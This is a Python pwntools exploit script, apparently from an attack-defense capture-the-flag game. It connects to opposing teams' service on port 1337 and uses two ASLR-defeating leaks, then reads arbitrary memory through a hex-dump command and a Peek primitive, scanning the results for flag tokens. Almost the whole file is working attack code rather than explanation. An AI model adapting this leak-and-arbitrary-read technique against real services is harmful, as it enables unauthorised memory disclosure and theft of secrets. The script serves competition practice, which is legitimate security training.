#!/usr/bin/env python3
import pwn
import os
import sys
import re
# Default timeout for every pwntools receive call in this module.
pwn.context.timeout = 1
# pwn.context.log_level = logging.WARNING

# Target selection: the LOCALHOST_RULEZ environment variable switches to a
# local instance; otherwise the first CLI argument is taken as the team id and
# interpolated, unvalidated, into the 10.60.<team_id>.1 address.
port = 1337
if "LOCALHOST_RULEZ" in os.environ:
    ip = "127.0.0.1"
else:
    team_id = sys.argv[1]
    ip = f"10.60.{team_id}.1"
def connect():
    """Open a session to (ip, port) and consume the banner up to the first prompt.

    Returns the pwntools tube positioned just after the first ``Ready`` marker.
    Raises whatever ``pwn.remote`` / ``recvuntil`` raise on connection failure
    or timeout.
    """
    io = pwn.remote(ip, port)
    # Markers are consumed in order; each call blocks until its marker arrives.
    banner_markers = (
        b"_______ ______ ____ ____ _____ | | ____ __ __ | | _____ _/ |_ ____ _______ \n",
        b"The value stack is empty",
        b"Ready",
    )
    for marker in banner_markers:
        io.recvuntil(marker)
    return io
def extract_flags(s, print_flags=False):
    """Return the sorted, de-duplicated flag-shaped tokens found in *s*.

    A token is 31 upper-case letters or digits followed by ``=``. *s* must be
    bytes; it is decoded as latin-1 so arbitrary byte values never raise.
    When *print_flags* is true the count and the tokens are also printed.
    """
    text = s.decode("latin1")
    matches = re.findall("[A-Z0-9]{31}=", text)
    flags = sorted(set(matches))
    if print_flags:
        print(f"Found {len(flags)} flags")
        print("\n".join(flags))
    return flags
def deaslr1(io):
    """Send ``Random`` and derive an address from the highlighted number in the reply.

    The reply is parsed as the decimal integer between the ``;35m`` colour
    code and the next ESC byte; it is XORed with a fixed constant and shifted
    left by 12 (presumably to a page boundary -- confirm against the service).
    Consumes the trailing ``Ready`` prompt before returning.
    """
    io.sendline(b"Random")
    io.recvuntil(b";35m")
    raw = io.recvuntil(b"\x1b", drop=True)
    unmasked = int(raw) ^ 1804289383
    addx = unmasked << 12
    io.recvuntil(b"Ready")
    return addx
def deaslr2(io):
    """Send the literal ``0x0ddba11`` and derive an address from the highlighted reply.

    The decimal integer between the ``;35m`` colour code and the next ESC byte
    is read and a fixed offset of 2800 is subtracted. Consumes the trailing
    ``Ready`` prompt before returning.
    """
    io.sendline(b"0x0ddba11")
    io.recvuntil(b";35m")
    raw = io.recvuntil(b"\x1b", drop=True)
    addx = int(raw) - 2800
    io.recvuntil(b"Ready")
    return addx
def arbitrary_read1(io, addx):
    """Request a hex dump starting at *addx* and scan the bytes for flags.

    Reply lines are consumed until one contains ``Ready``; from each line the
    8-byte groups of ``xx xx ...`` hex pairs are un-hexed and accumulated.
    Any exception (timeout, EOF, parse failure) ends the read silently --
    this is deliberate best-effort -- and whatever was collected up to that
    point is still passed to ``extract_flags``. Returns None.
    """
    chunks = []
    try:
        io.sendline(b"8192")
        io.recvuntil(b"Ready")
        io.sendline(str(addx).encode())
        io.recvuntil(b"Ready")
        io.sendline(b"[todo]Hxd")
        while True:
            line = io.recvline().decode("latin1")
            if "Ready" in line:
                break
            groups = re.findall(r"(?:[a-f0-9]{2} ){8}", line)
            hexdigits = "".join(group.replace(" ", "") for group in groups)
            chunks.append(pwn.unhex(hexdigits))
    except Exception:
        # NOTE(review): a reply that never contains "Ready" is only terminated
        # by an exception from recvline; confirm the tube raises on timeout.
        pass
    extract_flags(b"".join(chunks), True)
def arbitrary_read2(io, addx, start, end):
    """Read 8-byte words at ``addx + i*8`` for ``i`` in ``range(start, end)`` and scan them for flags.

    Each word is obtained with a Clear / <address> / Peek exchange and the
    highlighted decimal reply is packed with ``pwn.p64`` (reduced mod 2**64
    first). The first exception from the session stops the loop; what was
    collected so far is still scanned. This function never returns normally:
    it ends with ``sys.exit()``.
    """
    def peek_word(index):
        # One Clear / <address> / Peek exchange; the caller consumes the
        # trailing "Ready" prompt so the packed bytes are kept even if that
        # final read fails.
        io.sendline(b"Clear")
        io.recvuntil(b"Ready")
        io.sendline(str(addx + index * 8).encode())
        io.recvuntil(b"Ready")
        io.sendline(b"Peek")
        io.recvuntil(b";35m")
        value = int(io.recvuntil(b"\x1b", drop=True)) % 2**64
        return pwn.p64(value)

    collected = b""
    for index in range(start, end):
        try:
            collected += peek_word(index)
            io.recvuntil(b"Ready")
        except Exception:
            break
    extract_flags(collected, True)
    sys.exit()